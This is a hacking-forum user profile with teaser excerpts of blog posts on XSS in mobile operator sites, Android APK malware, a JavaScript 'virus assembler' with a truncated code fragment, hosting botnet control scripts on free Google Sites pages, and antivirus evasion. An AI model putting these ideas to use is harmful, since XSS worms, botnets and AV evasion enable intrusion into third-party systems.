About prashant_uniyal
- Biography:
- A student by day..and a Hacker by night :)
- Location:
- localhost
- Interests:
- Ethical hacking, Penetration testing ,Exploit code development
The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
__________________________________________________ _____________________
Total Posts
- Total Posts
- 505
- Posts Per Day
- 0.11
General Information
- Last Activity
- 01-16-2017 05:06 PM
- Join Date
- 07-08-2010
- Referrals
- 2
10 Friends
Showing Friends 1 to 9 of 10
View prashant_uniyal's Blog
by
prashant_uniyal on 10-22-2012 at 08:38 PM
While passing by common websites, we had came across various security issues in them in the past. Be it a bug on Facebook, Flipkart or Indian Shopping sites, we have brought up many issues in the past and have responsibly disclosed them. This time while passing by few mobile operators website, we noticed Cross-site scripting a.k.a XSS, 2nd top on the OWASP top 10 list. These vulnerabilities can be noticed very easily and can be used by cyber crooks to execute malicious scripts on the website, and
Read More
by
prashant_uniyal on 05-22-2012 at 02:51 PM
In the past few years, malware and Trojans have moved with a rapid pace when it comes to mobile portability. Many famous Trojans and malwares have been detected and analyzed in the past. Android being the latest and a popular mobile platform has become all time famous target of cyber crooks and malware authors. Android application package file or APK is the file format used to distribute and install application software and middle-ware into Android operating system.To make an APK file, a program
Read More
by
prashant_uniyal on 08-23-2010 at 03:26 PM
Now I just need to scramble the code. For this purpose I created a HTML file containing the code and encoder and decoder. This file will assemble the virus and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var
Read More
by
prashant_uniyal on 08-23-2010 at 01:49 PM
This is a google's free page uploading facility (http://sites.google.com/site). I loaded the .js file as an attatchment. But it contained nothing initially.It was meant for controlling the Botnet and commanding it later in forming the XSS tunnels. It was the second stage of two staged botnet formation.Note: The third party free sites are also useful to connect to a botnet if you do not have any dedicated server. In ur script file at free site like google,you can place a script that can redirect
Read More
by
prashant_uniyal on 08-10-2010 at 07:44 PM
Evading AV Signatures..Derailing the Antivirus
Author: "vinnu"
Greetz : Prashant Uniyal, b0nd, Lord Deathstorm, D4rk357, G4H
Team : Legion Of Xtremers (LOX).
The perimeter defence (antivirus) is still considered fullproof measure by most of people
in virtual world. Such an assumption is fatal and can lead to more sophisticated compromise
of systems.
Note: In my last paper, "Heap spray -- Slipping CPU
Read More
Home Page
Find latest posts
View Articles
View Blog Entries
